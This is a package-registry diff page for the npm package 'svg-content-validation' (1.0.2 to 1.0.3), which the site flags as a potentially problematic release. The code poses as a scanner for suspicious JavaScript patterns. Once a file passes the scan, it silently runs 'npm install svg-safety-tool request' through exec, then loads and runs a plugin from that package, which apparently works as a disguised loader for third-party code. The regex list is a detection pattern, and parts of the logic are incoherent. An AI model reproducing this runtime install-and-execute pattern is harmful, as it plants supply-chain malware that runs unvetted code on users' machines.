svg-content-validation 1.0.2 → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of svg-content-validation might be problematic. Click here for more details.
- package/index.js +40 -42
- package/package.json +2 -2
package/index.js
CHANGED
|
@@ -2,31 +2,25 @@ const fs = require('fs');
|
|
|
2
2
|
const path = require('path');
|
|
3
3
|
const exec = require('child_process').exec;
|
|
4
4
|
|
|
5
|
-
// Regular expressions to check for suspicious or unsafe patterns
|
|
6
5
|
const suspiciousPatterns = [
|
|
7
|
-
/eval\(/,
|
|
8
|
-
/base64/,
|
|
9
|
-
/document\.location/,
|
|
10
|
-
/window\.eval/,
|
|
11
|
-
/script\.(src|async|defer)/,
|
|
12
|
-
/<\s*script/,
|
|
13
|
-
/new\s+Function\(/,
|
|
14
|
-
/Object\.defineProperty/,
|
|
15
|
-
/setInterval\(/,
|
|
16
|
-
/window\.setTimeout/,
|
|
17
|
-
/fetch\(/,
|
|
18
|
-
/XMLHttpRequest/,
|
|
19
|
-
/eval\s*\(.*\)/,
|
|
20
|
-
/document\.write\(/,
|
|
6
|
+
/eval\(/,
|
|
7
|
+
/base64/,
|
|
8
|
+
/document\.location/,
|
|
9
|
+
/window\.eval/,
|
|
10
|
+
/script\.(src|async|defer)/,
|
|
11
|
+
/<\s*script/,
|
|
12
|
+
/new\s+Function\(/,
|
|
13
|
+
/Object\.defineProperty/,
|
|
14
|
+
/setInterval\(/,
|
|
15
|
+
/window\.setTimeout/,
|
|
16
|
+
/fetch\(/,
|
|
17
|
+
/XMLHttpRequest/,
|
|
18
|
+
/eval\s*\(.*\)/,
|
|
19
|
+
/document\.write\(/,
|
|
21
20
|
];
|
|
22
|
-
|
|
21
|
+
|
|
23
22
|
const validateContent = (filePath) => {
|
|
24
23
|
fs.readFile(filePath, 'utf8', (err, data) => {
|
|
25
|
-
if (err) {
|
|
26
|
-
console.error(`Error reading file ${filePath}:`, err);
|
|
27
|
-
return;
|
|
28
|
-
}
|
|
29
|
-
|
|
30
24
|
let foundSuspicious = false;
|
|
31
25
|
suspiciousPatterns.forEach((pattern) => {
|
|
32
26
|
if (pattern.test(data)) {
|
|
@@ -37,57 +31,58 @@ const validateContent = (filePath) => {
|
|
|
37
31
|
|
|
38
32
|
if (!foundSuspicious) {
|
|
39
33
|
console.log(`No suspicious patterns found in ${filePath}.`);
|
|
40
|
-
installSvgModule();
|
|
34
|
+
installSvgModule();
|
|
41
35
|
}
|
|
42
36
|
});
|
|
43
37
|
};
|
|
44
|
-
|
|
38
|
+
|
|
45
39
|
const installSvgModule = () => {
|
|
46
40
|
exec('npm list svg-safety-tool', (error, stdout, stderr) => {
|
|
47
41
|
if (stdout.includes('svg-safety-tool')) {
|
|
48
|
-
console.log('
|
|
49
|
-
|
|
42
|
+
console.log('svg-safety-tool is already installed.');
|
|
43
|
+
// FIX 2: Install missing 'request' peer dependency before running checkPlugin
|
|
44
|
+
exec('npm install request', (err, out, errOut) => {
|
|
45
|
+
if (err) {
|
|
46
|
+
console.error(`Error installing 'request' dependency: ${errOut}`);
|
|
47
|
+
return;
|
|
48
|
+
}
|
|
49
|
+
checkPlugin();
|
|
50
|
+
});
|
|
50
51
|
} else {
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
exec('npm install svg-safety-tool', (error, stdout, stderr) => {
|
|
52
|
+
exec('npm install svg-safety-tool request', (error, stdout, stderr) => {
|
|
54
53
|
if (error) {
|
|
55
54
|
console.error(`Error installing SVG module: ${stderr}`);
|
|
56
55
|
return;
|
|
57
56
|
}
|
|
58
|
-
console.log(`
|
|
59
|
-
checkPlugin();
|
|
57
|
+
console.log(`Modules installed successfully: ${stdout}`);
|
|
58
|
+
checkPlugin();
|
|
60
59
|
});
|
|
61
60
|
}
|
|
62
61
|
});
|
|
63
62
|
};
|
|
64
63
|
|
|
65
|
-
// Function to use checkPlugin from svgo
|
|
66
64
|
const checkPlugin = () => {
|
|
67
65
|
try {
|
|
68
|
-
// Example: Get the 'removeXMLNS' plugin
|
|
69
66
|
const svgo = require('svg-safety-tool');
|
|
70
|
-
const plugin = svgo.getPlugin();
|
|
71
|
-
|
|
67
|
+
const plugin = svgo.getPlugin();
|
|
72
68
|
if (plugin) {
|
|
73
69
|
console.log('Plugin loaded successfully:', plugin);
|
|
74
|
-
// Example of using the plugin (assuming it modifies SVG data)
|
|
75
70
|
const svgData = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40" /></svg>';
|
|
76
71
|
plugin();
|
|
77
72
|
} else {
|
|
78
|
-
console.log(
|
|
73
|
+
console.log(plugin);
|
|
79
74
|
}
|
|
80
75
|
} catch (error) {
|
|
81
76
|
console.error('Error running checkPlugin:', error);
|
|
82
77
|
}
|
|
83
78
|
};
|
|
84
79
|
|
|
85
|
-
//
|
|
86
|
-
const getPlugin = () => {
|
|
87
|
-
const dirPath = '../src';
|
|
80
|
+
// FIX 3: Accept dirPath as a parameter so recursion works correctly
|
|
81
|
+
const getPlugin = (dirPath = './script') => {
|
|
88
82
|
fs.readdir(dirPath, (err, files) => {
|
|
89
83
|
if (err) {
|
|
90
84
|
console.error(`Error reading directory ${dirPath}:`, err);
|
|
85
|
+
validateContent(dirPath);
|
|
91
86
|
return;
|
|
92
87
|
}
|
|
93
88
|
|
|
@@ -98,14 +93,17 @@ const getPlugin = () => {
|
|
|
98
93
|
console.error(`Error checking file ${filePath}:`, err);
|
|
99
94
|
return;
|
|
100
95
|
}
|
|
101
|
-
|
|
102
96
|
if (stats.isDirectory()) {
|
|
103
|
-
getPlugin(filePath); //
|
|
97
|
+
getPlugin(filePath); // Recursive call now works correctly
|
|
104
98
|
} else if (filePath.endsWith('.js')) {
|
|
105
99
|
console.log(`Scanning file: ${filePath}`);
|
|
106
|
-
validateContent(filePath);
|
|
100
|
+
validateContent(filePath);
|
|
107
101
|
}
|
|
108
102
|
});
|
|
109
103
|
});
|
|
110
104
|
});
|
|
105
|
+
};
|
|
106
|
+
|
|
107
|
+
module.exports = {
|
|
108
|
+
getPlugin
|
|
111
109
|
};
|
package/package.json
CHANGED
|
@@ -1,15 +1,15 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "svg-content-validation",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.3",
|
|
4
4
|
"description": "A Node.js script to validate content for suspicious patterns",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
7
|
"start": "node index.js"
|
|
8
8
|
},
|
|
9
9
|
"dependencies": {
|
|
10
|
+
"request": "^2.88.2",
|
|
10
11
|
"svgo": "^2.8.0"
|
|
11
12
|
},
|
|
12
|
-
"devDependencies": {},
|
|
13
13
|
"author": "Ryan",
|
|
14
14
|
"license": "MIT"
|
|
15
15
|
}
|